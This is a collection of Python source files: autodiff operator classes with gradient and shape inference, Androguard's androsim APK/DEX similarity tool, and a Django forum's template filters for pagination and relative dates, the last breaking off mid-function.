        :param input_vals: Values of input node

        Returns
        -------
        :return: The output value of the node (written into output_val)
        """
        raise NotImplementedError

    def gradient(self, node, output_grads):
        """
        Given the value of output gradients this operation calculate the
        gradient contribution of each input node

        Parameters
        ----------
        :param node:
        :param output_grads:

        Returns
        -------
        :return: A list of gradient contribution to each input node respectively
        """
        raise NotImplementedError

    def infer_shape(self, node, input_shapes):
        # Subclasses derive the output shape from the input shapes.
        raise NotImplementedError
class AddOp(Op):
    """Element-wise addition of two nodes."""

    def __call__(self, nodeA, nodeB):
        """Return a new node representing ``nodeA + nodeB`` element-wise."""
        new_node = Op.__call__(self)
        new_node.inputs = [nodeA, nodeB]
        new_node.name = '({}+{})'.format(nodeA.name, nodeB.name)
        return new_node

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """Write the element-wise sum of the two inputs into *output_val*.

        :param node: node performing the computation
        :param input_vals: list of exactly two input arrays
        :param output_val: pre-allocated output buffer
        :param use_numpy: True for the NumPy path, False for the GPU path
        """
        assert len(input_vals) == 2
        if use_numpy:
            output_val[:] = input_vals[0] + input_vals[1]
        else:
            if input_vals[0].shape == input_vals[1].shape:
                gpu_op.matrix_elementwise_add(input_vals[0], input_vals[1], output_val)
            elif input_vals[0].shape == (1,):
                # A (1,)-shaped operand is treated as a scalar constant.
                const = input_vals[0].asnumpy()[0]
                gpu_op.matrix_elementwise_add_by_const(input_vals[1], const, output_val)
            elif input_vals[1].shape == (1,):
                # BUG FIX: this previously read asnumpy()[1], which is out of
                # bounds for a length-1 array; the scalar lives at index 0.
                const = input_vals[1].asnumpy()[0]
                gpu_op.matrix_elementwise_add_by_const(input_vals[0], const, output_val)
            else:
                pass  # TODO: (upul) handle input[0] and input[1] in different shapes

    def gradient(self, node, output_grads):
        """Addition passes the incoming gradient unchanged to both inputs."""
        return [output_grads, output_grads]

    def infer_shape(self, node, input_shapes):
        """Output shape equals the (identical) input shapes."""
        assert len(input_shapes) == 2
        assert input_shapes[0] == input_shapes[1]
        return input_shapes[0]
class AddByConstOp(Op):
    """Element-wise addition of a node and a scalar constant."""

    def __call__(self, node_A, const_val):
        """Return a node representing ``node_A + const_val``."""
        out = Op.__call__(self)
        out.const = const_val
        out.inputs = [node_A]
        out.name = '({0:s}+{1:f})'.format(node_A.name, const_val)
        return out

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """Add the stored constant to the single input, writing into output_val."""
        assert len(input_vals) == 1
        if not use_numpy:
            gpu_op.matrix_elementwise_add_by_const(
                input_vals[0], node.const, output_val)
        else:
            output_val[:] = node.const + input_vals[0]

    def gradient(self, node, output_grads):
        """The constant contributes no gradient; pass output_grads through."""
        return [output_grads]

    def infer_shape(self, node, input_shapes):
        """Adding a constant leaves the shape unchanged."""
        assert len(input_shapes) == 1
        return input_shapes[0]
class SubOp(Op):
    """Element-wise subtraction of one node from another."""

    def __call__(self, node_A, node_B):
        result = Op.__call__(self)
        result.inputs = [node_A, node_B]
        result.name = '({0:s}-{1:s})'.format(node_A.name, node_B.name)
        return result

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """Write ``input_vals[0] - input_vals[1]`` into output_val."""
        assert len(input_vals) == 2
        minuend, subtrahend = input_vals
        if not use_numpy:
            gpu_op.matrix_elementwise_subtract(minuend, subtrahend, output_val)
        else:
            output_val[:] = minuend - subtrahend

    def gradient(self, node, output_grads):
        # d(a-b)/da = 1 and d(a-b)/db = -1.
        return [output_grads, -1 * output_grads]

    def infer_shape(self, node, input_shapes):
        """Both inputs must share a shape, which is also the output shape."""
        assert len(input_shapes) == 2
        assert input_shapes[0] == input_shapes[1]
        return input_shapes[0]
class SubByConstOp(Op):
    """Element-wise subtraction of a scalar constant from a node."""

    def __call__(self, node_A, const_val):
        result = Op.__call__(self)
        result.inputs = [node_A]
        result.const = const_val
        result.name = '({0:s}-{1:f})'.format(node_A.name, const_val)
        return result

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """Write ``input - const`` into the output buffer."""
        assert len(input_vals) == 1
        if not use_numpy:
            gpu_op.matrix_elementwise_subtract_by_const(input_vals[0], node.const, output_val)
        else:
            output_val[:] = input_vals[0] - node.const

    def gradient(self, node, output_grads):
        # Subtracting a constant does not scale the gradient.
        return [output_grads]

    def infer_shape(self, node, input_shapes):
        """Shape is unchanged by subtracting a constant."""
        assert len(input_shapes) == 1
        return input_shapes[0]
class ReflectedSubByConstOp(Op):
    """Element-wise subtraction of a node from a scalar: ``const - node``."""

    def __call__(self, node_A, const_val):
        new_node = Op.__call__(self)
        new_node.inputs = [node_A]
        new_node.const = const_val
        new_node.name = '({0:f}-{1:s})'.format(const_val, node_A.name)
        return new_node

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """Write ``node.const - input_vals[0]`` into *output_val*.

        BUG FIX: the previous implementation *returned* the result instead of
        writing into the caller-supplied buffer, so output_val was never
        populated (every other op in this module writes into output_val).
        """
        assert len(input_vals) == 1
        if use_numpy:
            output_val[:] = node.const - input_vals[0]
        else:
            # Composed from existing kernels: out = (-1) * x, then out += const.
            # NOTE(review): assumes the add-by-const kernel tolerates
            # input == output aliasing -- confirm before enabling on GPU.
            gpu_op.matrix_elementwise_multiply_by_const(input_vals[0], -1.0, output_val)
            gpu_op.matrix_elementwise_add_by_const(output_val, node.const, output_val)

    def gradient(self, node, output_grads):
        # d(const - x)/dx = -1.
        return [-1 * output_grads]

    def infer_shape(self, node, input_shapes):
        """Shape is unchanged by reflected subtraction."""
        assert len(input_shapes) == 1
        return input_shapes[0]
class OnesLikeOp(Op):
    """Produce an all-ones array shaped like the input node."""

    def __call__(self, node_A):
        ones_node = Op.__call__(self)
        ones_node.inputs = [node_A]
        ones_node.name = 'Oneslike({})'.format(node_A.name)
        return ones_node

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """Fill output_val with ones matching the input's shape."""
        assert len(input_vals) == 1
        if not use_numpy:
            gpu_op.array_set(output_val, 1)
        else:
            assert isinstance(input_vals[0], np.ndarray)
            output_val[:] = np.ones(input_vals[0].shape)

    def gradient(self, node, output_grads):
        # The output is constant, so the input receives a zero gradient.
        return [zeros_like(node.inputs[0])]

    def infer_shape(self, node, input_shapes):
        assert len(input_shapes) == 1
        # Scalars are modelled with shape (1,).
        if input_shapes[0] == 1:
            return (1,)
        return input_shapes[0]
class ZerosLikeOp(Op):
    """Produce an all-zeros array shaped like the input node."""

    def __call__(self, node_A):
        zeros_node = Op.__call__(self)
        zeros_node.inputs = [node_A]
        zeros_node.name = 'Zeroslike({})'.format(node_A.name)
        return zeros_node

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """Fill output_val with zeros matching the input's shape."""
        assert len(input_vals) == 1
        if not use_numpy:
            gpu_op.array_set(output_val, 0)
        else:
            assert isinstance(input_vals[0], np.ndarray)
            output_val[:] = np.zeros(input_vals[0].shape)

    def gradient(self, node, output_grads):
        # The output is constant, so the input receives a zero gradient.
        return [zeros_like(node.inputs[0])]

    def infer_shape(self, node, input_shapes):
        assert len(input_shapes) == 1
        # Scalars are modelled with shape (1,).
        if input_shapes[0] == 1:
            return (1,)
        return input_shapes[0]
class ReshapeOp(Op):
    """Reshape the input array to the target shape stored on the node."""

    def __call__(self, node_A, newshape):
        new_node = Op.__call__(self)
        new_node.inputs = [node_A]
        new_node.newshape = newshape
        new_node.name = 'Reshape({})'.format(node_A.name)
        return new_node

    def compute(self, node, input_vals, output_val, use_numpy=True):
        assert len(input_vals) == 1
        if use_numpy:
            assert isinstance(input_vals[0], np.ndarray)
            output_val[:] = np.reshape(input_vals[0], newshape=node.newshape)
        else:
            # TODO: (upul) changing share is not an expensive operation. But looks
            #     : bit ugly. Can't we find out an alternative approach?
            # GPU path: temporarily give the output buffer the input's shape so
            # the device copy matches, then reshape it to the target shape.
            input_shape = input_vals[0].shape
            ndarray.reshape(output_val, input_shape)
            input_vals[0].copyto(output_val)
            ndarray.reshape(output_val, node.newshape)

    def gradient(self, node, output_grads):
        # The gradient is the incoming gradient reshaped back to the input's shape.
        return [reshape_grad(node.inputs[0], output_grads)]

    def infer_shape(self, node, input_shapes):
        assert len(input_shapes) == 1
        return node.newshape
class ReshapeGradientOp(Op):
    """Reshape a gradient (node_B's value) back to node_A's shape."""

    def __call__(self, node_A, node_B):
        new_node = Op.__call__(self)
        new_node.inputs = [node_A, node_B]
        new_node.name = 'ReshapeGradientOp({0:s})'.format(node_A.name)
        return new_node

    def compute(self, node, input_vals, output_val, use_numpy=True):
        # input_vals[0]: forward-pass input (shape reference);
        # input_vals[1]: incoming gradient to be reshaped.
        assert len(input_vals) == 2
        if use_numpy:
            output_val[:] = input_vals[1].reshape(input_vals[0].shape)
        else:
            # TODO: (upul) changing share is not an expensive operation. But looks
            #     : bit ugly. Can't we find out an alternative approach?
            ndarray.reshape(output_val, input_vals[0].shape)
            input_vals[1].copyto(output_val)

    def gradient(self, node, output_grads):
        # Second-order gradients through the reshape gradient are not supported.
        raise NotImplementedError('Gradient of ReshapeGradientOp not supported')

    def infer_shape(self, node, input_shapes):
        # Output takes the shape of the first (reference) input.
        assert len(input_shapes) == 2
        return input_shapes[0]
class MulOp(Op):
    """Element-wise multiplication of two nodes; a (1,)-shaped operand acts as a scalar."""

    def __call__(self, node_A, node_B):
        new_node = Op.__call__(self)
        new_node.inputs = [node_A, node_B]
        new_node.name = '({0:s}*{1:s})'.format(node_A.name, node_B.name)
        return new_node

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """Write the element-wise product of the two inputs into output_val."""
        assert len(input_vals) == 2
        if use_numpy:
            output_val[:] = input_vals[0] * input_vals[1]
        else:
            ip_1_shape = input_vals[0].shape
            ip_2_shape = input_vals[1].shape
            if ip_1_shape == ip_2_shape:
                gpu_op.matrix_elementwise_multiply(input_vals[0], input_vals[1], output_val)
            elif ip_1_shape == (1,):
                # (1,)-shaped operand is a scalar constant.
                const_val = input_vals[0].asnumpy()[0]
                gpu_op.matrix_elementwise_multiply_by_const(input_vals[1], const_val, output_val)
            elif ip_2_shape == (1,):
                const_val = input_vals[1].asnumpy()[0]
                gpu_op.matrix_elementwise_multiply_by_const(input_vals[0], const_val, output_val)
            else:
                pass  # TODO (upul) handle ip_1_shape != ip_2_shape

    def gradient(self, node, output_grads):
        # Product rule: d(a*b)/da = b and d(a*b)/db = a.
        return [node.inputs[1] * output_grads, node.inputs[0] * output_grads]

    def infer_shape(self, node, input_shapes):
        """Output shape follows the non-scalar operand; mismatches are an error."""
        assert len(input_shapes) == 2
        if input_shapes[0] == (1,):
            return input_shapes[1]
        elif input_shapes[1] == (1,):
            return input_shapes[0]
        elif input_shapes[0] == input_shapes[1]:
            return input_shapes[0]
        else:
            # BUG FIX: the original message used '{0:s}, (1:s)' -- the second
            # placeholder was mistyped as '(1:s)' and the ':s' spec rejects
            # tuple arguments, so formatting itself raised before RuntimeError.
            stmt = 'Invalid dimensions {0}, {1}'.format(input_shapes[0], input_shapes[1])
            raise RuntimeError(stmt)
class MulByConstOp(Op):
    """Element-wise multiplication of a node by a scalar constant."""

    def __call__(self, node_A, const_val):
        scaled = Op.__call__(self)
        scaled.inputs = [node_A]
        scaled.const = const_val
        scaled.name = '({0:s}*{1:f})'.format(node_A.name, const_val)
        return scaled

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """Scale the single input by the stored constant into output_val."""
        assert len(input_vals) == 1
        if not use_numpy:
            gpu_op.matrix_elementwise_multiply_by_const(
                input_vals[0], node.const, output_val)
        else:
            output_val[:] = node.const * input_vals[0]

    def gradient(self, node, output_grads):
        # d(c*x)/dx = c.
        return [node.const * output_grads]

    def infer_shape(self, node, input_shapes):
        """Scaling by a constant leaves the shape unchanged."""
        assert len(input_shapes) == 1
        return input_shapes[0]
class DivOp(Op):
    """Element-wise division of one node by another."""

    def __call__(self, node_A, node_B):
        quotient = Op.__call__(self)
        quotient.inputs = [node_A, node_B]
        quotient.name = '({0:s}/{1:s})'.format(node_A.name, node_B.name)
        return quotient

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """Write ``input_vals[0] / input_vals[1]`` into output_val."""
        assert len(input_vals) == 2
        numerator, denominator = input_vals
        if not use_numpy:
            gpu_op.matrix_elementwise_division(numerator, denominator, output_val)
        else:
            output_val[:] = numerator / denominator

    def gradient(self, node, output_grads):
        # Quotient rule: d(a/b)/da = 1/b and d(a/b)/db = -a/b^2.
        grad_A = output_grads / node.inputs[1]
        grad_B = -1.0 * output_grads * node.inputs[0] / (node.inputs[1] * node.inputs[1])
        return [grad_A, grad_B]

    def infer_shape(self, node, input_shapes):
        """Both inputs must share a shape, which is also the output shape."""
        assert len(input_shapes) == 2
        assert input_shapes[0] == input_shapes[1]
        return input_shapes[0]
class DivByConstOp(Op):
    """Element-wise division of a node by a scalar constant."""

    def __call__(self, node_A, const_val):
        scaled = Op.__call__(self)
        scaled.inputs = [node_A]
        scaled.const = const_val
        scaled.name = '({0:s}/{1:f})'.format(node_A.name, const_val)
        return scaled

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """Divide the single input by the stored constant into output_val."""
        assert len(input_vals) == 1
        if not use_numpy:
            gpu_op.matrix_elementwise_div_by_const(input_vals[0], node.const, output_val)
        else:
            output_val[:] = input_vals[0] / node.const

    def gradient(self, node, output_grads):
        # d(x/c)/dx = 1/c.
        return [output_grads / node.const]

    def infer_shape(self, node, input_shapes):
        """Dividing by a constant leaves the shape unchanged."""
        assert len(input_shapes) == 1
        return input_shapes[0]
class PlaceholderOp(Op):
    """Op to feed value to a nodes."""

    def __call__(self):
        """Creates a variable node."""
        new_node = Op.__call__(self)
        return new_node

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """No compute function since node value is fed directly in Executor."""
        # Reaching this means the executor was not given a value for this node.
        assert False, "placeholder values provided by feed_dict"

    def gradient(self, node, output_grad):
        """No gradient function since node has no inputs."""
        return None
class ReduceSumOp(Op):
    """Sum the input over axis 0 (e.g. to aggregate gradients across a batch)."""

    def __call__(self, node_A):
        new_node = Op.__call__(self)
        new_node.inputs = [node_A]
        new_node.name = 'ReduceSum({0:s})'.format(node_A.name)
        return new_node

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """
        :param node:
        :param input_vals: single input array
        :param output_val: buffer receiving the axis-0 sum
        :param use_numpy: True for the NumPy path, False for the GPU path
        :return:
        """
        assert len(input_vals) == 1
        if use_numpy:
            assert isinstance(output_val, np.ndarray)
            # Sum across the first axis only.
            output_val[:] = np.sum(input_vals[0], axis=0)
        else:
            gpu_op.reduce_sum_axis_zero(input_vals[0], output_val)

    def gradient(self, node, output_grads):
        # NOTE(review): the gradient is passed through unchanged; this seems to
        # rely on broadcasting elsewhere to expand it back to the input's
        # shape -- confirm against BroadcastToOp usage.
        return [output_grads]

    def infer_shape(self, node, input_shapes):
        assert len(input_shapes) == 1
        # 1-D inputs collapse to a scalar, modelled as shape (1,).
        if len(input_shapes[0]) == 1:
            return (1,)
        else:
            # Otherwise drop axis 0 and keep the remaining dimensions.
            return tuple(input_shapes[0][i]
                         for i in range(1, len(input_shapes[0])))
class BroadcastToOp(Op):
    """Broadcast node_A's value to the shape of node_B."""

    def __call__(self, node_A, node_B):
        new_node = Op.__call__(self)
        new_node.inputs = [node_A, node_B]
        new_node.name = 'BroadcastTo({0:s}, {1:s}.shape)'.format(node_A.name, node_B.name)
        return new_node

    def compute(self, node, input_vals, output_val, use_numpy=True):
        assert len(input_vals) == 2
        if use_numpy:
            output_val[:] = np.broadcast_to(input_vals[0], input_vals[1].shape)
        else:
            gpu_op.broadcast_to(input_vals[0], output_val)

    def gradient(self, node, output_grads):
        # Reverse of broadcasting is summation over the broadcast axis.
        grad_A = reduce_sum(output_grads)
        # node_B only supplies the target shape, so it gets a zero gradient.
        grad_B = zeros_like(node.inputs[1])
        return [grad_A, grad_B]

    def infer_shape(self, node, input_shapes):
        # Output takes the shape of the second (target) input.
        assert len(input_shapes) == 2
        return input_shapes[1]
class MatMulOp(Op):
    """Matrix multiplication of two nodes, with optional operand transposes."""

    def __call__(self, node_A, node_B, trans_A=False, trans_B=False):
        new_node = Op.__call__(self)
        new_node.inputs = [node_A, node_B]
        new_node.trans_A = trans_A
        new_node.trans_B = trans_B
        new_node.name = 'MatMul({0:s}, {1:s}'.format(node_A.name, node_B.name)
        return new_node

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """Write ``op(A) . op(B)`` (op = optional transpose) into output_val."""
        assert len(input_vals) == 2
        if use_numpy:
            # BUG FIX: the original wrote the transposed arrays back into
            # input_vals, mutating the caller's list as a side effect; use
            # locals instead so the inputs are left untouched.
            lhs = input_vals[0].T if node.trans_A else input_vals[0]
            rhs = input_vals[1].T if node.trans_B else input_vals[1]
            output_val[:] = np.dot(lhs, rhs)
        else:
            gpu_op.matrix_multiply(
                input_vals[0], node.trans_A,
                input_vals[1], node.trans_B,
                output_val)

    def gradient(self, node, output_grads):
        # For Y = A.B: dA = dY.B^T and dB = A^T.dY.
        grad_A = matmul(output_grads, node.inputs[1], trans_A=False, trans_B=True)
        grad_B = matmul(node.inputs[0], output_grads, trans_A=True, trans_B=False)
        return [grad_A, grad_B]

    def infer_shape(self, node, input_shapes):
        """Infer the (rows, cols) of the product, honouring the transpose flags."""
        assert len(input_shapes) == 2
        (row_A, col_A) = input_shapes[0]
        if node.trans_A:
            row_A, col_A = col_A, row_A
        (row_B, col_B) = input_shapes[1]
        if node.trans_B:
            row_B, col_B = col_B, row_B
        # Inner dimensions must agree for the product to exist.
        assert col_A == row_B
        return (row_A, col_B)
def Variable(name):
    """Create a named placeholder node for user-supplied values.

    e.g. x = Variable(name="x")
    """
    node = placeholder()
    node.name = name
    return node
def Parameter(name, init):
    """Create a named placeholder node carrying an initial value.

    example: w = Parameter(name='w', init=...)

    :param name: debug name for the node
    :param init: initial value stored on the node's ``const`` slot
    :return: the placeholder node
    """
    node = placeholder()
    node.name = name
    node.const = init
    return node
# Global singleton operations: each Op subclass is instantiated exactly once
# and shared by every node in the graph (ops hold no per-node state; that
# lives on the Node objects themselves).
add = AddOp()
add_const = AddByConstOp()
sub = SubOp()
sub_const = SubByConstOp()
ref_sub_const = ReflectedSubByConstOp()
mul = MulOp()
mul_const = MulByConstOp()
div = DivOp()
div_const = DivByConstOp()
zeros_like = ZerosLikeOp()
ones_like = OnesLikeOp()
reduce_sum = ReduceSumOp()
broadcast_to = BroadcastToOp()
reshape = ReshapeOp()
reshape_grad = ReshapeGradientOp()
matmul = MatMulOp()
placeholder = PlaceholderOp()
| apache-2.0 |
andymg/androguard | androsim.py | 38 | 8073 | #!/usr/bin/env python
# This file is part of Androguard.
#
# Copyright (C) 2012, Anthony Desnos <desnos at t0t0.fr>
# All rights reserved.
#
# Androguard is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Androguard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Androguard. If not, see <http://www.gnu.org/licenses/>.
import sys, os
from optparse import OptionParser
from androguard.core import androconf
from androguard.core.bytecodes import apk, dvm
from androguard.core.analysis import analysis
sys.path.append("./elsim")
from elsim import elsim
from elsim.elsim_dalvik import ProxyDalvik, FILTERS_DALVIK_SIM
from elsim.elsim_dalvik import ProxyDalvikStringMultiple, ProxyDalvikStringOne, FILTERS_DALVIK_SIM_STRING
# Command-line option descriptions, consumed by optparse in __main__ below
# (each dict's 'name' entry is popped and used as the flag names).
option_0 = { 'name' : ('-i', '--input'), 'help' : 'file : use these filenames', 'nargs' : 2 }
option_1 = { 'name' : ('-t', '--threshold'), 'help' : 'specify the threshold (0.0 to 1.0) to know if a method is similar. This option will impact on the filtering method. Because if you specify a higher value of the threshold, you will have more associations', 'nargs' : 1 }
option_2 = { 'name' : ('-c', '--compressor'), 'help' : 'specify the compressor (BZ2, ZLIB, SNAPPY, LZMA, XZ). The final result depends directly of the type of compressor. But if you use LZMA for example, the final result will be better, but it take more time', 'nargs' : 1 }
option_4 = { 'name' : ('-d', '--display'), 'help' : 'display all information about methods', 'action' : 'count' }
option_5 = { 'name' : ('-n', '--new'), 'help' : 'calculate the final score only by using the ratio of included methods', 'action' : 'count' }
option_6 = { 'name' : ('-e', '--exclude'), 'help' : 'exclude specific class name (python regexp)', 'nargs' : 1 }
option_7 = { 'name' : ('-s', '--size'), 'help' : 'exclude specific method below the specific size (specify the minimum size of a method to be used (it is the length (bytes) of the dalvik method)', 'nargs' : 1 }
option_8 = { 'name' : ('-x', '--xstrings'), 'help' : 'display similarities of strings', 'action' : 'count' }
option_9 = { 'name' : ('-v', '--version'), 'help' : 'version of the API', 'action' : 'count' }
option_10 = { 'name' : ('-l', '--library'), 'help' : 'use python library (python) or specify the path of the shared library)', 'nargs' : 1 }
# Note: there is no option_3; the list below is the registration order.
options = [option_0, option_1, option_2, option_4, option_5, option_6, option_7, option_8, option_9, option_10]
def check_one_file(a, d1, dx1, FS, threshold, file_input, view_strings=False, new=True, library=True) :
    """Compare the reference dex (d1/dx1) against one APK/DEX file and print
    method (and optionally string) similarity reports (Python 2 script)."""
    d2 = None
    ret_type = androconf.is_android( file_input )
    if ret_type == "APK" :
        a = apk.APK( file_input )
        d2 = dvm.DalvikVMFormat( a.get_dex() )
    elif ret_type == "DEX" :
        d2 = dvm.DalvikVMFormat( open(file_input, "rb").read() )

    # Not an Android artifact: silently skip.
    if d2 == None :
        return
    dx2 = analysis.VMAnalysis( d2 )

    el = elsim.Elsim( ProxyDalvik(d1, dx1), ProxyDalvik(d2, dx2), FS, threshold, options.compressor, libnative=library )
    el.show()
    print "\t--> methods: %f%% of similarities" % el.get_similarity_value(new)

    if options.display :
        print "SIMILAR methods:"
        diff_methods = el.get_similar_elements()
        for i in diff_methods :
            el.show_element( i )

        print "IDENTICAL methods:"
        new_methods = el.get_identical_elements()
        for i in new_methods :
            el.show_element( i )

        print "NEW methods:"
        new_methods = el.get_new_elements()
        for i in new_methods :
            # False: new elements have no counterpart to diff against.
            el.show_element( i, False )

        print "DELETED methods:"
        del_methods = el.get_deleted_elements()
        for i in del_methods :
            el.show_element( i )

        print "SKIPPED methods:"
        skipped_methods = el.get_skipped_elements()
        for i in skipped_methods :
            el.show_element( i )

    # Optional second pass comparing string pools instead of methods.
    if view_strings :
        els = elsim.Elsim( ProxyDalvikStringMultiple(d1, dx1),
                           ProxyDalvikStringMultiple(d2, dx2),
                           FILTERS_DALVIK_SIM_STRING,
                           threshold,
                           options.compressor,
                           libnative=library )
        #els = elsim.Elsim( ProxyDalvikStringOne(d1, dx1),
        #                  ProxyDalvikStringOne(d2, dx2), FILTERS_DALVIK_SIM_STRING, threshold, options.compressor, libnative=library )
        els.show()
        print "\t--> strings: %f%% of similarities" % els.get_similarity_value(new)

        if options.display :
            print "SIMILAR strings:"
            diff_strings = els.get_similar_elements()
            for i in diff_strings :
                els.show_element( i )

            print "IDENTICAL strings:"
            new_strings = els.get_identical_elements()
            for i in new_strings :
                els.show_element( i )

            print "NEW strings:"
            new_strings = els.get_new_elements()
            for i in new_strings :
                els.show_element( i, False )

            print "DELETED strings:"
            del_strings = els.get_deleted_elements()
            for i in del_strings :
                els.show_element( i )

            print "SKIPPED strings:"
            skipped_strings = els.get_skipped_elements()
            for i in skipped_strings :
                els.show_element( i )
def check_one_directory(a, d1, dx1, FS, threshold, directory, view_strings=False, new=True, library=True) :
    """Walk *directory* recursively and run check_one_file on every file found."""
    for root, dirs, files in os.walk( directory, followlinks=True ) :
        if files != [] :
            for f in files :
                # Build the full path, normalising the trailing slash.
                real_filename = root
                if real_filename[-1] != "/" :
                    real_filename += "/"
                real_filename += f

                print "filename: %s ..." % real_filename
                check_one_file(a, d1, dx1, FS, threshold, real_filename, view_strings, new, library)
############################################################
def main(options, arguments) :
    """Entry point: load the reference APK/DEX, build the similarity filters
    from the CLI options, then compare against a file or a whole directory."""
    if options.input != None :
        a = None
        # options.input[0] is the reference artifact, options.input[1] the target.
        ret_type = androconf.is_android( options.input[0] )
        if ret_type == "APK" :
            a = apk.APK( options.input[0] )
            d1 = dvm.DalvikVMFormat( a.get_dex() )
        elif ret_type == "DEX" :
            d1 = dvm.DalvikVMFormat( open(options.input[0], "rb").read() )

        dx1 = analysis.VMAnalysis( d1 )

        threshold = None
        if options.threshold != None :
            threshold = float(options.threshold)

        # Configure method-skipping filters (exclusion regexp, minimum size).
        FS = FILTERS_DALVIK_SIM
        FS[elsim.FILTER_SKIPPED_METH].set_regexp( options.exclude )
        FS[elsim.FILTER_SKIPPED_METH].set_size( options.size )

        # -n flag flips the scoring mode (see get_similarity_value(new)).
        new = True
        if options.new != None :
            new = False

        # -l selects the native library, or pure python when "python" is given.
        library = True
        if options.library != None :
            library = options.library
            if options.library == "python" :
                library = False

        if os.path.isdir( options.input[1] ) == False :
            check_one_file( a, d1, dx1, FS, threshold, options.input[1], options.xstrings, new, library )
        else :
            check_one_directory(a, d1, dx1, FS, threshold, options.input[1], options.xstrings, new, library )

    elif options.version != None :
        print "Androsim version %s" % androconf.ANDROGUARD_VERSION
if __name__ == "__main__" :
parser = OptionParser()
for option in options :
param = option['name']
del option['name']
parser.add_option(*param, **option)
options, arguments = parser.parse_args()
sys.argv[:] = arguments
main(options, arguments)
| apache-2.0 |
Liubusy/V2GO | forum/templatetags/forum_extras.py | 7 | 5807 | # coding: utf-8
'''
Django模板引擎的自定义过滤器,需要在模板中引用
{% load forum_extras %}
'''
import json, re, random
from datetime import date, datetime
from django import template
from django.utils import timezone
from markdown import markdown
register = template.Library()
@register.filter(name='dump_errors')
def dump_errors(errors): # render form errors as a Bootstrap alert list
    # Renders a mapping of field -> error list as an <ul class="errors"> block.
    t = template.Template('''
    {% if errors %}
    <ul class="errors alert alert-error">
    {% for v in errors.itervalues %}
    <li>{{ v | join:',' }}</li>
    {% endfor %}
    </ul>
    {% endif %}
    ''')
    c = template.Context(dict(errors = errors))
    return t.render(c)
@register.simple_tag
def build_uri(uri, param, value): # add a query parameter to uri, or replace its value
    regx = re.compile('[\?&](%s=[^\?&]*)' % param)
    find = regx.search(uri)
    # '?' starts the query string if there is none yet, otherwise append with '&'.
    split = '&' if re.search(r'\?', uri) else '?'
    if not find: return '%s%s%s=%s' % (uri, split, param, value)
    # NOTE(review): the matched "param=value" text is reused as a regex
    # pattern here; existing values containing regex metacharacters could
    # misbehave -- confirm inputs or consider re.escape.
    return re.sub(find.group(1), '%s=%s' % (param, value), uri)
@register.simple_tag
def pagination(page, uri, list_rows = 10): # render pagination links
    def gen_page_list(current_page = 1, total_page = 1, list_rows = 10):
        # Produce a window of at most list_rows page numbers centred on
        # current_page, clamped to [1, total_page].
        if total_page <= list_rows:
            return range(1, total_page + 1)
        elif current_page <= (list_rows // 2):
            return range(1, list_rows + 1)
        elif current_page >= (total_page - list_rows // 2):
            return range(total_page - list_rows + 1, total_page + 1)
        else:
            return range(current_page - list_rows // 2, current_page - list_rows // 2 + list_rows)
    t = template.Template('''
    {% load forum_extras %} {# 如果要使用自定义tag filter这里也需要加载 #}
    {% if page and page.pages > 1 %}
    <ul>
    <li {% ifequal page.index page.prev %}class="disabled"{% endifequal %}><a href="{% build_uri uri 'p' page.prev %}">«</a></li>
    {% for p in gen_page_list %}
    <li {% ifequal page.index p %}class="active"{% endifequal %}>
    {% ifnotequal page.index p %}
    <a href="{% build_uri uri 'p' p %}">{{ p }}</a>
    {% else %}
    <a href="javascript:;">{{ p }}</a>
    {% endifnotequal %}
    </li>
    {% endfor %}
    <li {% ifequal page.index page.next %}class="disabled"{% endifequal %}><a href="{% build_uri uri 'p' page.next %}">»</a></li>
    </ul>
    {% endif %}
    ''')
    c = template.Context(dict(page = page, uri = uri, gen_page_list = gen_page_list(page.index, page.pages, list_rows)))
    return t.render(c)
@register.filter(name='pretty_date')
def pretty_date(time = None): # humanised timestamp, e.g. "3 小时前" ("3 hours ago")
    '''
    Get a datetime object or a int() Epoch timestamp and return a
    pretty string like 'an hour ago', 'Yesterday', '3 months ago',
    'just now', etc
    '''
    if time == None:
        return time
    now = timezone.now()
    if isinstance(time, basestring):
        # BUG FIX: parsed strings previously fell through without ever
        # computing `diff`, raising UnboundLocalError below.  Parse here and
        # let the datetime branch handle the result.
        # NOTE(review): strptime() yields a naive datetime while
        # timezone.now() may be aware (USE_TZ); mixing them raises TypeError
        # -- confirm the project's timezone settings.
        time = datetime.strptime(time, '%Y-%m-%d %H:%M:%S')
    if isinstance(time, int):
        diff = now - datetime.fromtimestamp(time)
    elif isinstance(time, datetime):
        diff = now - time
    elif not time:
        diff = now - now
    # .seconds is the intra-day remainder; the day_diff checks below ensure
    # it is only used for differences under one day.
    second_diff = diff.seconds
    day_diff = diff.days

    if day_diff < 0:
        return ''

    if day_diff == 0:
        if second_diff < 10:
            return '刚刚'
        if second_diff < 60:
            return str(second_diff) + ' 秒前'
        if second_diff < 120:
            return '1 分钟前'
        if second_diff < 3600:
            # floor division keeps Python 2 behaviour and works on Python 3
            return str(second_diff // 60) + ' 分钟前'
        if second_diff < 7200:
            return '1 小时前'
        if second_diff < 86400:
            return str(second_diff // 3600) + ' 小时前'
    if day_diff == 1:
        return '昨天'
    if day_diff < 7:
        return str(day_diff) + ' 天前'
    if day_diff < 31:
        return str(day_diff // 7) + ' 周前'
    if day_diff < 365:
        return str(day_diff // 30) + ' 月前'
    # BUG FIX: day_diff // 365 counts *years*, but the suffix previously said
    # ' 天前' (days ago); it now reads ' 年前' (years ago).
    return str(day_diff // 365) + ' 年前'
@register.filter(name='content_process')
def content_process(content): # content post-processing: embed gists, weibo images, youku videos, @mentions
